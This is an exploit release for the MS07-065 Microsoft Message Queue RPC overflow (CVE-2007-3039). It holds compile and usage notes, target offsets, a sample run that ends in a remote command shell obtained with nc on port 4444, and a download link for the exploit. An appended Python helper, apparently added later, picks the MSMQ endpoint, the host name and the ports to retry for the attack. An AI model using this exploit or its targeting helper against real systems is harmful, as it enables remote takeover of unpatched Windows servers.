******************************************************************************
********************** merry christmas Sysadmins *****************************
******************************************************************************
************** Microsoft Message Queue POC exploit ( MS07-065 ) **************
Mario Ballano - (mballano~gmail.com) - http://www.48bits.com
Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org
******************************************************************************

* Original Advisory: http://www.zerodayinitiative.com/advisories/ZDI-07-076.html

* Microsoft Bulletin: http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx

* CVE Code: CVE-2007-3039 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039

* Timeline: No naked news this time, just rum and whiskey

* Additional information:
    From Microsoft support, http://support.microsoft.com/?id=178517 : RPC ports used by MSMQ (2101, 2103, 2105) and the dynamic RPC ports
    HSC, of course: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html
    Dave's unmidl: http://www.immunitysec.com/resources-freesoftware.shtml

* How to compile: run your favourite SetEnv.Cmd from the Microsoft SDK, then run nmake.

* Note: Several RPC ports can be used to trigger the overflow. Once you have hit a system, it looks like you will need to send the exploit twice, or specify another port (-p), to exploit it again.
  The offsets may be invalid for other Windows 2000 Server builds (only Spanish Windows 2000 Advanced Server was tested); adjust them if needed.
* Usage:

C:\Programación\MessageQueue>MessageQueue.exe
--------------------------------------------------------------
Microsoft MessageQueue local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 Advanced server SP4
--------------------------------------------------------------
Usage: MessageQueue.exe -h hostname [-d Dnssuffix] [-n netbiosname] [-p port] [-t lang]

Targets:
   0 (0x6bad469b) - Windows 2000 Advanced server English (default - untested)
   1 (0x6b9d469b) - Windows 2000 Advanced server Spanish
   2 (0x41414141) - Windows 2000 Advanced server crash

C:\Programación\MessageQueue>MessageQueue.exe -h 192.168.1.39
--------------------------------------------------------------
Microsoft MessageQueue local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 Advanced server SP4
--------------------------------------------------------------
[+] Binding to ncacn_ip_tcp:192.168.1.39
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[LRPC00000414.00000001]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QMsvc$testserver]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QmReplService]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QMMgmtFacility$testserver]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.39[1222]
[+] Using gathered netbios name: testserver
[+] Dynamic MessageQueue rpc port found (1222)
[+] Connecting to fdb3a030-065f-11d1-bb9b-00a024ea5525@ncacn_ip_tcp:192.168.1.39[1222]
[+] RpcBindingFromStringBinding success
[+] Trying to fingerprint target...
[+] Fqdn name obtained from netbios packet: testserver.local
[+] Remote OS Fingerprint (05.00)
[+] Remote Host identified as Windows 2000
[+] Sending POC Exploit code to QMCreateObjectInternal()
[+] Try to connect to remote host at port 4444 for a shell

C:\>nc 192.168.1.39 4444
Microsoft Windows 2000 [Versión 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4760.zip (2007-MessageQueue.zip)

# milw0rm.com [2007-12-21]
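The discovery pass in the output above is what makes the exploit portable across the dynamic-port problem the note warns about: the tool walks the endpoint mapper, keeps every endpoint registered for the MSMQ interface UUID, takes the ncacn_ip_tcp endpoint as the target port, and recovers the machine name from the ncalrpc QMsvc$<name> endpoint. The following script is an added example (not code from the PoC or its authors) that does the same selection offline on the tool's output. The RPC string-binding syntax it parses, [uuid@]protseq:[addr][endpoint], is the standard DCE/Microsoft form; the function names, the Binding class and the port-retry list that combines the discovered port with the 2101/2103/2105 ports from the KB reference are my own choices; the SAMPLE_OUTPUT block is a constructed copy of the lines shown on this page.

```python
"""Pick the MSMQ RPC endpoint from endpoint-mapper output, MS07-065 PoC style.

Added example, not part of the original exploit. SAMPLE_OUTPUT is a constructed
copy of the page's tool output; helper names are assumptions of this example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Interface UUID the page lists for the MSMQ queue manager RPC interface.
MSMQ_IFACE_UUID = "fdb3a030-065f-11d1-bb9b-00a024ea5525"

# Fixed MSMQ RPC ports named in the page's KB reference; used as fallbacks for -p.
KNOWN_MSMQ_RPC_PORTS = (2101, 2103, 2105)

# RPC string binding: [ObjUuid@]ProtSeq:[NetworkAddr][Endpoint,Options]
_BINDING_RE = re.compile(
    r"^(?:(?P<uuid>[0-9a-fA-F-]{36})@)?"
    r"(?P<protseq>[a-z_]+):"
    r"(?P<addr>[^\[]*)"
    r"(?:\[(?P<endpoint>[^\],]*)(?:,(?P<options>[^\]]*))?\])?$"
)
_FOUND_RE = re.compile(r"^\[\+\] Found (?P<uuid>[0-9a-fA-F-]{36}) version (?P<ver>[\d.]+)$")
_BIND_RE = re.compile(r"^\[\+\] RPC binding string: (?P<binding>.+)$")


@dataclass
class Binding:
    protseq: str
    addr: str
    endpoint: str
    uuid: Optional[str] = None


def parse_binding(s: str) -> Binding:
    """Split one RPC string binding into its protocol sequence, address, endpoint."""
    m = _BINDING_RE.match(s.strip())
    if not m:
        raise ValueError(f"not an RPC string binding: {s!r}")
    uuid = m["uuid"].lower() if m["uuid"] else None
    return Binding(m["protseq"], m["addr"], m["endpoint"] or "", uuid)


def parse_epm_output(text: str) -> List[Binding]:
    """Pair each '[+] Found <uuid>' line with the binding string that follows it."""
    bindings: List[Binding] = []
    current_uuid: Optional[str] = None
    for line in text.splitlines():
        line = line.strip()
        m = _FOUND_RE.match(line)
        if m:
            current_uuid = m["uuid"].lower()
            continue
        m = _BIND_RE.match(line)
        if m:
            b = parse_binding(m["binding"])
            b.uuid = b.uuid or current_uuid
            bindings.append(b)
    return bindings


def tcp_port(b: Binding) -> Optional[int]:
    """Port of an ncacn_ip_tcp binding; None for ncalrpc and other transports."""
    if b.protseq != "ncacn_ip_tcp" or not b.endpoint.isdigit():
        return None
    return int(b.endpoint)


def find_msmq_port(bindings: List[Binding]) -> Optional[int]:
    """First dynamic TCP port registered for the MSMQ interface, as the PoC reports."""
    for b in bindings:
        if b.uuid == MSMQ_IFACE_UUID:
            p = tcp_port(b)
            if p is not None:
                return p
    return None


def netbios_name(bindings: List[Binding]) -> Optional[str]:
    """Machine name carried by the queue manager's ncalrpc endpoint QMsvc$<name>."""
    for b in bindings:
        if b.protseq == "ncalrpc" and b.endpoint.startswith("QMsvc$"):
            return b.endpoint[len("QMsvc$"):]
    return None


def candidate_ports(bindings: List[Binding]) -> List[int]:
    """Discovered dynamic port first, then the fixed MSMQ ports, for retrying with -p."""
    ports: List[int] = []
    p = find_msmq_port(bindings)
    if p is not None:
        ports.append(p)
    ports.extend(k for k in KNOWN_MSMQ_RPC_PORTS if k not in ports)
    return ports


# Constructed sample: the endpoint-mapper lines from the page's run against 192.168.1.39.
SAMPLE_OUTPUT = """\
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[LRPC00000414.00000001]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QMsvc$testserver]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QmReplService]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QMMgmtFacility$testserver]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.39[1222]
"""

if __name__ == "__main__":
    found = parse_epm_output(SAMPLE_OUTPUT)
    print("netbios name:", netbios_name(found))
    print("msmq dynamic port:", find_msmq_port(found))
    print("ports to try with -p:", candidate_ports(found))
```

The uuid-prefixed form the tool prints when it binds (fdb3a030-...@ncacn_ip_tcp:192.168.1.39[1222]) parses with the same function, so the selection logic can be reused on either the enumeration lines or the final binding string.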